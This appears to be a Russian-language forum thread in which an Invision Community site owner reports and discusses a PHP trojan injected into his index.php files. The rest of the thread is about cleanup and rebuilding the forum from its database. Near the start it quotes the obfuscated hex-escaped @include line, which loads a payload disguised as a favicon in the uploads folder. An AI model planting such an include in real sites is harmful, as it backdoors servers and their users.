Karagor Posted January 4, 2018 Report Share Posted January 4, 2018 В какой-то момент перестала вызываться страница "непрочитанный контент". Полез пытаться разобраться и первое на что наткнулся это добавка во всех индексах: <?php /*acedb*/ @include "\x2fvar\x2fwww\x2fkar\x61gor\x2fdat\x61/ww\x77/sp\x6frt-\x68ors\x65.pr\x6f/up\x6coad\x73/ga\x6cler\x79/al\x62um_\x3337/\x66avi\x63on_\x31da2\x668.i\x63o"; /*acedb*/ /** * @brief Public bootstrap * @author <a href='https://www.invisioncommunity.com'>Invision Power Services, Inc.</a> * @copyright (c) Invision Power Services, Inc. * @license https://www.invisioncommunity.com/legal/standards/ * @package Invision Community * @since 18 Feb 2013 */ $_SERVER['SCRIPT_FILENAME'] = __FILE__; require_once 'init.php'; \IPS\Dispatcher\Front::i()->run(); Что это такое? Quote Link to comment Share on other sites More sharing options...
Karagor Posted January 4, 2018 Author Report Share Posted January 4, 2018 дкодировал, инклюда ведет @include "/var/www/karagor/data/www/sport-horse.pro/uploads/gallery/album_337/favicon_1da2f8.ico"; и выяснилось, что это троян PHP/Kryptik.BC Quote Link to comment Share on other sites More sharing options...
Karagor Posted January 4, 2018 Author Report Share Posted January 4, 2018 Как хрень эту выковыривать-то... Есть у кого-нибудь опыт? Quote Link to comment Share on other sites More sharing options...
Cheshir Posted January 4, 2018 Report Share Posted January 4, 2018 Скачайте полностью на комп, скачайте Notepad++, и удалите из всех файлов при помощи поиска/замены в файлах, потом замените на сайте... Не понятно, как умудрились схватить, хтмл для пользователей разрешен? слабенький хостинг и инъекцию сделали? Quote Link to comment Share on other sites More sharing options...
Karagor Posted January 5, 2018 Author Report Share Posted January 5, 2018 Стоял 3.4 сначала - началось еще на нем, думал все вычистил. Quote Link to comment Share on other sites More sharing options...
Cheshir Posted January 5, 2018 Report Share Posted January 5, 2018 vps? Quote Link to comment Share on other sites More sharing options...
Karagor Posted January 5, 2018 Author Report Share Posted January 5, 2018 firstvds и да vps Короче кривыми руками снес на сервере папку с форумом... , что-то тупею с годами... ((( Пытаюсь поднять заново - ставлю чистый новый с тестовой базой, подменяю базу - и теряю полностью стиль. Можно зайти на форум посмотреть что там видно... как это лечить-то? Quote Link to comment Share on other sites More sharing options...
Respected Posted January 5, 2018 Report Share Posted January 5, 2018 При обновлении на 4.x файлы заменяются, в том числе и на index.php 2 минуты назад, Karagor сказал: как это лечить-то? Установить правильные права на директории. Quote Link to comment Share on other sites More sharing options...
Karagor Posted January 5, 2018 Author Report Share Posted January 5, 2018 индексы-то теперь чистые - только дизайн форум потерял я в трешке как-то еще разбирался - а тут как баран покачто так с новой базой все работает, а со старой нет по логике в базе самой есть какие-то пути и они не совпадают база конвертированная из трешки Quote Link to comment Share on other sites More sharing options...
Cheshir Posted January 5, 2018 Report Share Posted January 5, 2018 21 минуту назад, Karagor сказал: vps Проверьте сервак на вирусы, походу скрипт пишет какой-то, если еще на нем есть домены, посмотрите, есть ли в них такая же зараза. Quote Link to comment Share on other sites More sharing options...
Karagor Posted January 5, 2018 Author Report Share Posted January 5, 2018 запустил проверку... с тестовой базой теперь тоже не работает... Quote Link to comment Share on other sites More sharing options...
Karagor Posted January 6, 2018 Author Report Share Posted January 6, 2018 Антивирус на vps какой-то странный, что-то он там то ли делал, то ли нет... Вобщем в сухом остатке у меня есть база из которой форум виден без дизайна. Сам починить не могу - знаний и понимания не хватает. Может кто-то помочь? Quote Link to comment Share on other sites More sharing options...
WOLF Posted January 6, 2018 Report Share Posted January 6, 2018 установить с нуля форум, перенести необходимые таблицы с пользователями и темами, и дальше настроить все как было раньше Quote Link to comment Share on other sites More sharing options...
Karagor Posted January 6, 2018 Author Report Share Posted January 6, 2018 Логически это понятно, а вот практически не очень Например в таблице core_members в чистой базе 93 поля, а в рабочей 97 и хрен его знает почему... Quote Link to comment Share on other sites More sharing options...
Karagor Posted January 6, 2018 Author Report Share Posted January 6, 2018 Кстати на вирусы таки сервер проверил - угроз не обнаружено Quote Link to comment Share on other sites More sharing options...
Cheshir Posted January 6, 2018 Report Share Posted January 6, 2018 9 минут назад, Karagor сказал: Кстати на вирусы таки сервер проверил - угроз не обнаружено сайты на серваке еще есть? Проверьте их на наличие похожего кода, если есть и на других сайтах, то 100% вирус на сервере, и то, чем вы проверяете просто напросто не эффективно. Quote Link to comment Share on other sites More sharing options...
Karagor Posted January 6, 2018 Author Report Share Posted January 6, 2018 Так получилось, что я снес все файлы - только база осталась, я же писал. Так что если вирус не мог приползти из базы, то фалов нет. а в какой таблице хранятся разделы форума? никак не пойму Quote Link to comment Share on other sites More sharing options...
Karagor Posted January 6, 2018 Author Report Share Posted January 6, 2018 переношу таблицы в чистый форум перенеc core_members, forums_ удалось зайти в админку, но список пользователей не показывает нормально, как и список форумов... порядок действий не ясен вобщем Quote Link to comment Share on other sites More sharing options...
WOLF Posted January 6, 2018 Report Share Posted January 6, 2018 1 час назад, Karagor сказал: переношу таблицы в чистый форум перенеc core_members, forums_ удалось зайти в админку, но список пользователей не показывает нормально, как и список форумов... порядок действий не ясен вобщем вам же вроде предложили уже помощь на другом форуме Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.